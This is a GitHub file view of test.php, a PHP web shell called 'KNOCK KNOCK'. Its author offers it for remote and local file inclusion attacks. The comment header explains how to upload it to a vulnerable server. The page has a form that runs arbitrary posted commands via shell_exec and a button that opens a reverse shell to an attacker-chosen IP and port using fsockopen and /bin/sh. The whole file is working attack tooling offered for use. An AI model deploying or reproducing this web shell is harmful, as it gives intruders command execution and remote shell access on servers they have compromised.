-
Notifications
You must be signed in to change notification settings - Fork 0
/
test.php
66 lines (62 loc) · 2.03 KB
/
test.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
<?php
/*
Name : KNOCK KNOCK
Owner : Naman Sahore
Email : namansahore@gmail.com
Published on : 30th July 2017
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
This shell scrpit can be used for performing Remote File Inclusion
as well as Local File Inclusion( by adding .php at the end of
script) and getting REVERSE SHELL from vulnerable server
or performing shell command on browser.
HOW TO USE:
FOR RFI
Clear .txt extention and upload the script on a server and
preform RFI.
FOR LFI
Clear .txt and add .php extention to the script and
perform LFI by uploading shell script on a
vulnerable server.
Comment for more information.
*/
?>
<body style="background-color:rgb(200,200,200);">
<form action="<?php $link = (isset($_SERVER['HTTPS']) ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]"; echo "{$link}"?>" method="POST">
<center>
<strong>
</br>
<h1 color="rgb(255, 0, 31)"><b>KNOCK KNOCK</b></h1>
</br>
<h2 color="rgb(255, 0, 31)"><b>SHELL</b></h2>
COMMAND : <input type="text" name="cmd" value=""/>
<input type="submit" name="submit" value="CMD" />
</br></br>
<h2 color="rgb(255, 0, 31)"><b>R SHELL USING PHP</b></h2>
<p><b><i>*NOTE : </b>Before triggring rshell, start listening</i></p>
</br>
IP : <input type="text" name="ip" value=""/> PORT : <input type="text" name="port" value=""/>
<input type="submit" name="submit" value="R SHELL" />
</strong>
</center>
<br />
<strong>
<font size="5">
<?php
if(isset($_POST["cmd"])){
$cmd=$_POST["cmd"];
$output = shell_exec("{$cmd} 2>&1");
echo $cmd."</br>"."<pre>".$output."</pre>";
}
if (isset($_POST["ip"]) && isset($_POST["port"])) {
$sock="sock";
$cmd = "php -r '$"."{$sock}"."=fsockopen("."\"{$_POST["ip"]}\"".","."{$_POST["port"]}".");shell_exec(\""."/bin/sh -i <&3 >&3 2>&3"."\");'";
if (strlen($cmd)>66) {
shell_exec("{$cmd} 2>&1");
}
}
?>
</font>
</strong>
</body>